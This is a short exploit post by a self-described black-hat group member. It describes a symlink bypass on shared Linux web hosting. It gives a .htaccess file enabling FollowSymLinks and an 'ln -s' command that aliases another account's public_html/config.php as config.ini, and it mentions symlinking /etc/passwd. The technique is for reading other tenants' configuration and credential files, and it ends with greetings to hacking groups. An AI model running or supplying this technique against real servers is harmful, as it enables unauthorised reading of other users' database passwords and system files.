#############################################
mail : ehsan.empire1@gmail.com
#(+) Exploit Title: symlink bypass vulnerability
#(+) Author : 3H34N
#(+) E-mail : Ehsan.Empire@Att.Net
#(+) Platform : Tested on: linux
############################################
symlink bypass with ini method
when you symlink /etc/passwd and you can read it
but symlink /home/user/public_html/config.php opposite with error :
lscgid : execve() :/home/[patch]/public_html/
now you make a .htaccess file in current directory and copy this contain in it:
then symlink with this command:
ln -s /home/user/public_html/config.php config.ini
you see bypassed error execve() :/home/[patch]/public_html/ and can
you read config.ini
########################################################################
.htaccess file:
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
########################################################################
(+)IRANIAN Young HackerZ # Persian Gulf
(+)Black Hat Group Member : Net.Edit0r & DarkCoder & p3nt3st3r & H3x &
3H34N & D3adly #BHG
(+)Sp My Best Friend : Net.Edit0r ^ BlackHat ~ Immortal Boy ~ Mr.Xhat~
Ashkan ..SkilleR.. ~ r3d.s3cur1ty ~ 4min ~ d3v1l.eyes ~ S3Ri0uS and
all Friends
(+)Gr33ts to : All Iranian HackerZ
########################################################################
#
